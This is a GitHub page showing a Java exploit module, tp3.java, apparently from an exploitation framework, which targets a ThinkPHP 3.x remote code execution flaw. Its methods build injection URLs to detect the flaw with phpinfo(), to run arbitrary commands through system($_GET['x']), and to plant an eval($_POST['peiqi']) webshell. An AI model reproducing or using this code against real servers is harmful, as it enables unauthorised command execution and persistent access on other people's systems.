-
Notifications
You must be signed in to change notification settings - Fork 185
Expand file tree
/
Copy pathtp3.java
More file actions
executable file
·60 lines (56 loc) · 1.92 KB
/
tp3.java
File metadata and controls
executable file
·60 lines (56 loc) · 1.92 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
package exploit;
import com.github.kevinsawicki.http.HttpRequest;
import util.BasePayload;
import util.Module;
import util.Result;
/**
* Author 莲花 2021/6/20
*/
//thinkphp3.0
public class tp3 implements BasePayload {
@Override
public Result checkVUL(String url) throws Exception {
String CheckStr = "PHP Version";
Module m = new Module();
String module = m.getModule(url);
String payload = url + "/?s=" + module + "/\\think\\module/action/param1/${@phpinfo()}";
try {
HttpRequest req = HttpRequest.get(url);
if (req.body().contains(CheckStr)) {
return new Result(true, "ThinkPHP 3.x RCE", payload);
}
} catch (Exception e) {
e.printStackTrace();
}
return new Result(false, "ThinkPHP 3.x RCE", "");
}
@Override
public Result exeVUL(String url, String cmd) throws Exception {
Module m = new Module();
String module = m.getModule(url);
String payload_url = url + "/?s=" + module + "/\\think\\module/action/param1/{${system($_GET['x'])}}?x=" + cmd;
try {
String res = HttpRequest.get(payload_url).body();
return new Result(true, null, res);
} catch (
Exception e) {
e.printStackTrace();
}
return new Result(false, null, null);
}
@Override
public Result getShell(String url) throws Exception {
try {
Module m = new Module();
String module = m.getModule(url);
String shell_url = url + "/?s=" + module + "/\\think\\module/action/param1/{${eval($_POST['peiqi'])}}";
int code = HttpRequest.get(shell_url).code();
if (code == 200) {
return new Result(true, null, shell_url);
}
} catch (Exception e) {
e.printStackTrace();
}
return new Result(false, null, null);
}
}